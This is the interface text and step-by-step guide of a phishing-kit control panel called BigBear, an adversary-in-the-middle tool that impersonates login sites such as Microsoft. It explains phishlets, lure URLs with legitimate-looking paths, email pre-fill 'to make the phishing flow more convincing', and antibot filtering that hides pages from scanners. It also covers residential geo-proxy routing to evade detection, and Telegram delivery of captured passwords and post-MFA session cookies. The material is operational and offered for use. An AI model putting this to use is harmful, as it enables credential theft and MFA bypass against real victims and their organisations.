VPS Management
Manage your VPS servers and installations
| Name | IP Address | Domain | Status | Actions |
|---|
DNS Challenges & SSL
Generate ACME DNS challenges and SSL certificates
Active Installations
View all active installations with web panel access
Credentials
Permanently stored captures from all your VPS instances
| Password | Stage | Country | Browser | VPS | Keepalive | Captured | Actions |
|---|
Admin Panel
Manage users and view all VPS
User Management
| ID | Username | Role | Status | Created | Actions |
|---|
All VPS (All Users)
| ID | Name | IP | Domain | Status | User | Actions |
|---|
BigBear Control
Start, stop, restart, and monitor BigBear instances
Control Actions
BigBear Logs
Configuration
Manage BigBear configuration settings
Quick Guide
- Domain: Root domain your server listens on
- External IPv4: Public IP of your VPS
- Unauthorized URL: Redirect for invalid lure visits
- Webhook Verbosity: 0=off, 1=final auth, 2=all
Phishlets
Manage your phishing templates
Quick Guide
- Enable: Activates the phishlet and generates SSL
- Disable: Stops the phishlet
- Hide/Unhide: Returns 404 unless valid Lure ID present
- Subdomain: The subdomain prefix for this phishlet (e.g.
login→ login.example.com) - Redirect URL: Where blocked/unauthorized visitors are sent
| Name | Status | Domain | Subdomain | Redirect URL | Actions |
|---|
Lures
Manage your phishing lures
How Lures Work
- Lure URL: The entry point you share with targets. Antibot checks run here first.
- Domain URL: Base domain. Antibot active — no session created without lure path.
- Success Redirect: Where victim goes after authentication completes (leave blank for real site).
- Bot Redirect: Where blocked visitors (bots/scanners) are sent.
| ID | Phishlet | Lure URL | Success Redirect | Bot Redirect | Status | Actions |
|---|
Proxy Configuration
Geo-adaptive proxy routing for upstream connections
How Proxy Pool Works
- Geo-Matching: Visitor country is detected via IP intel. If a proxy with a matching country exists, it is used automatically.
- Fallback: If no country match, the first available enabled proxy is used.
- Sync: Click "Sync Pool to VPS" to push your proxy pool from this panel to the VPS config.
Proxy Pool (0 proxies)
| Name | Country | Address | Port | Type | Enabled |
|---|
Legacy Single Proxy (optional fallback)
Blacklist
Manage automatic IP blacklisting
Blacklist Modes
- Off: Ignore blacklist
- Unauth: Block only unauthorized requests
- All: Block all requests from blacklisted IPs
- NoAdd: Block existing, don't add new IPs
Engine Logs
Live log stream from the BigBear engine on the target VPS
Help & Guide
Step-by-step instructions for every feature
Quick Start (5 Steps)
Get a phishing page live in under 10 minutes:
- Buy a domain (e.g.
example.com) and a fresh Ubuntu VPS. - Point DNS — Add two A records at your registrar:
A example.com → VPS_IP
A *.example.com → VPS_IP - Add VPS in this panel — Enter the IP, SSH credentials, domain, and Telegram webhook.
- Click Install — The panel uploads the engine, configures everything, obtains SSL certificates automatically, and starts the engine.
- Create a Lure — Go to Lures, create one with path
/meetings. Your lure URL is ready to send.
VPS Management
This is your starting point. Add your target VPS servers here, and the panel will connect to them over SSH to manage everything remotely.
Adding a VPS
- Click + Add VPS and fill in the Name, IP, SSH port (usually 22), username (root), and password.
- Set the Domain you will use (e.g.
example.com). DNS must already point to the VPS IP. - BigBear Path is where the engine gets installed (default:
/root/bigbear). - Telegram Webhook sends real-time alerts. Format:
BOT_TOKEN/CHAT_ID(see Telegram section below).
VPS Actions
- Install: Runs the full automated setup on a fresh VPS (uploads engine, configures firewall, obtains SSL, starts service).
- Edit: Update IP, credentials, domain, or Telegram webhook.
- Delete: Removes the VPS from the panel. Does not touch the remote server.
Installation Process
When you click Install on a VPS, the panel runs a fully automated setup:
- Upload — Transfers
bigbear2.zipto the VPS containing the engine binary, phishlets, and proxy.json. - Extract — Unpacks the engine files to the BigBear path.
- Firewall — Opens ports 443, 80, 53, and 7654. Frees port 53 from systemd-resolved.
- Configuration — Writes
config.jsonwith your domain, IP, and Telegram settings. - Systemd Service — Creates and enables
bigbear-engine.servicefor automatic startup. - Start Engine — Launches the engine. SSL certificates are obtained automatically via Let's Encrypt.
DNS Setup
Before installing BigBear on a VPS, you must configure DNS at your domain registrar.
Required DNS Records
Add these two A records at your registrar (e.g. Namecheap, Cloudflare, GoDaddy):
| Type | Name | Value |
| A | @ | Your VPS IP |
| A | * | Your VPS IP |
*) is essential. The engine uses multiple subdomains (management, cdn, login, device, etc.) and they all must resolve to your VPS IP. Wait for DNS propagation (usually 5-30 minutes) before installing.
BigBear Control
Start, stop, restart, and monitor BigBear engine instances on your VPS servers.
- Start: Starts the BigBear engine via systemd. The engine binds to ports 443, 80, 53, and 7654.
- Stop: Stops the engine cleanly and releases all ports.
- Restart: Stops, waits for ports to release, then starts again. Use this after configuration changes.
- Logs: View real-time engine logs (visitors, credentials, antibot decisions, proxy routing).
Configuration
Edit the engine configuration on the selected VPS. Changes are saved to config.json and hot-reloaded automatically.
- Domain: The base domain for your phishing setup (e.g.
example.com). Cannot be changed after installation without reinstalling. - External IP: Your VPS's public IP. Must match your DNS A records exactly.
- Redirect URL: Where blocked visitors (bots, VPNs, datacenter IPs) get redirected. Default:
https://www.google.com - IPAPI Key: API key from
ipapi.isfor IP intelligence (antibot checks). Required for the antibot to work. - Telegram: Bot token and chat ID for real-time notifications.
Phishlets
Phishlets are YAML files that define how the engine impersonates a target website. They control domain mapping, URL rewriting, JavaScript injection, cookie capture, and credential interception.
Key Fields
- Subdomain: The landing subdomain (the one with
is_landing: true). This is used in your lure URLs. You can change it from this panel. - Domain: Auto-filled from your VPS configuration.
- Enabled/Disabled: Toggle the phishlet on or off.
phish_sub. Other proxy hosts (cdn, device, login, etc.) keep their original subdomains. After changing, restart the engine for the new subdomain to take effect.
Lures
Lures are the phishing URLs you send to targets. Each lure has a custom path and is tied to a phishlet.
How Lures Work
- Create a lure and set a path (e.g.
/meetings). - Your lure URL becomes:
https://management.example.com/meetings - When a visitor opens this URL, the engine runs the antibot check (ipapi.is).
- If the visitor passes (residential IP), the engine creates a session, whitelists their IP, and redirects them to the login page.
- If blocked (datacenter/VPN/proxy IP), the visitor is redirected to the redirect URL (default: google.com).
Lure Fields
| Path | Custom URL path. Use something that looks legitimate (e.g. /meetings, /document/view, /portal). |
| OG Title / Desc / Image | Open Graph tags for link previews when shared on social media or messaging apps. |
| UA Filter | Regex to only allow specific user agents (leave empty to allow all). |
| Paused | Temporarily disables the lure without deleting it. |
Autolink (Email Pre-fill)
Skip the email entry page by embedding the target's email directly in the lure URL.
How to Use
- Take your target's email (e.g.
john@company.com). - Encode it in Base64:
am9obkBjb21wYW55LmNvbQ(use any Base64 encoder). - Append
?handler=am9obkBjb21wYW55LmNvbQto your lure URL.
https://management.example.com/meetings?handler=am9obkBjb21wYW55LmNvbQ
The target will land directly on the password page with their email already filled in. This makes the phishing flow faster and more convincing.
Live Sessions
The Sessions section shows all active and completed phishing sessions in real-time.
Session Stages
| Visitor | Target opened the lure URL and was redirected to the login page. |
| Email Entered | Target typed their email address. |
| Password Entered | Target submitted their password. May show retry count if they re-entered it. |
| MFA Pending | Waiting for the target to complete MFA (authenticator app, SMS code, etc.). |
| Complete | Full session captured: email, password, and all authentication cookies. The cookie.js file is sent to Telegram. |
Geo-Proxy Routing
The engine automatically routes all traffic to the target site (e.g. Microsoft) through residential proxies matching the visitor's country.
How It Works
- When a visitor arrives, the antibot detects their country via ipapi.is (e.g. "Austria").
- All requests from that visitor to the target site are routed through the AT (Austria) proxy from proxy.json.
- Microsoft sees traffic coming from a residential Austrian IP instead of your VPS datacenter IP.
Fallback Chain
- Exact country proxy — Matches the visitor's country code.
- UK (GB) proxy — If the country proxy fails or is unavailable.
- Direct VPS IP — Last resort if all proxies fail.
proxy.json. They are automatically deployed to every new VPS during installation.
Antibot & IP Intelligence
Every visitor hitting a lure URL is checked in real-time via ipapi.is before they can see the login page.
What Gets Checked
- IP Blacklist: IPs manually added to blacklist.txt are blocked immediately.
- Bot User Agents: Known bot/scanner user agents are blocked.
- IP Intelligence (ipapi.is): Every request is checked synchronously. Datacenter, VPN, and proxy IPs are blocked. Only residential IPs pass through.
What Happens When Blocked
Blocked visitors are redirected to the Redirect URL (configured in Configuration section, default: google.com). They never see the phishing page.
Telegram Notifications
Get real-time alerts when visitors arrive, enter credentials, or complete authentication.
Step 1: Create a Telegram Bot
- Open Telegram and search for @BotFather.
- Send the command
/newbot. - Choose a name for your bot (e.g. "My Alerts").
- Choose a username (e.g.
myalerts_bot). - BotFather will reply with your Bot Token. It looks like:
7842901234:AAF_abcdef123456789xyz - Save this token.
Step 2: Get Your Chat ID
- Open Telegram and search for @userinfobot (or @getmyid_bot).
- Send
/startto the bot. - It will reply with your Chat ID (a number like
123456789).
For group chats: Add your bot to the group, send a message, then visit https://api.telegram.org/bot<TOKEN>/getUpdates and find the chat ID (it will be a negative number like -100xxxxxxxxxx).
Step 3: Enter in the Panel
When adding or editing a VPS, paste into the Telegram Webhook field using this format:
Example:
7842901234:AAF_abcdef123456789xyz/123456789
Notification Events
| New Visitor | IP, Country, ISP, User Agent, Phishlet |
| Credentials | Email, Password, IP, Country, ISP, User Agent, Phishlet |
| Session Complete | Email, Password, IP, Country, ISP, UA, Token count + cookie.js file attachment |
Troubleshooting
| Lure redirects to Google | The lure is not registered. Create one in the Lures section and restart the engine. |
| Port already in use | Stop the engine, wait 5 seconds, then start again. Use the Restart button. |
| SSL certificate error | Certificates are issued automatically. Wait 30 seconds after startup and try again. Check Engine Logs for errors. |
| Antibot blocks my IP | You are using a VPN or datacenter connection. Test from a residential internet connection (home WiFi, mobile data). |
| No Telegram notifications | Verify your bot token and chat ID. Make sure the webhook format is correct: BOT_TOKEN/CHAT_ID |
| Subdomain not loading | Check that your wildcard DNS record (*.example.com) points to the VPS IP. All subdomains must resolve. |
| 404 page after login | The phishlet's login URL may be misconfigured. Check Engine Logs for proxy errors. |
| Engine keeps restarting | Another process is holding the ports. Stop the engine, run pkill -9 bigbear-engine via SSH, wait 5 seconds, then start. |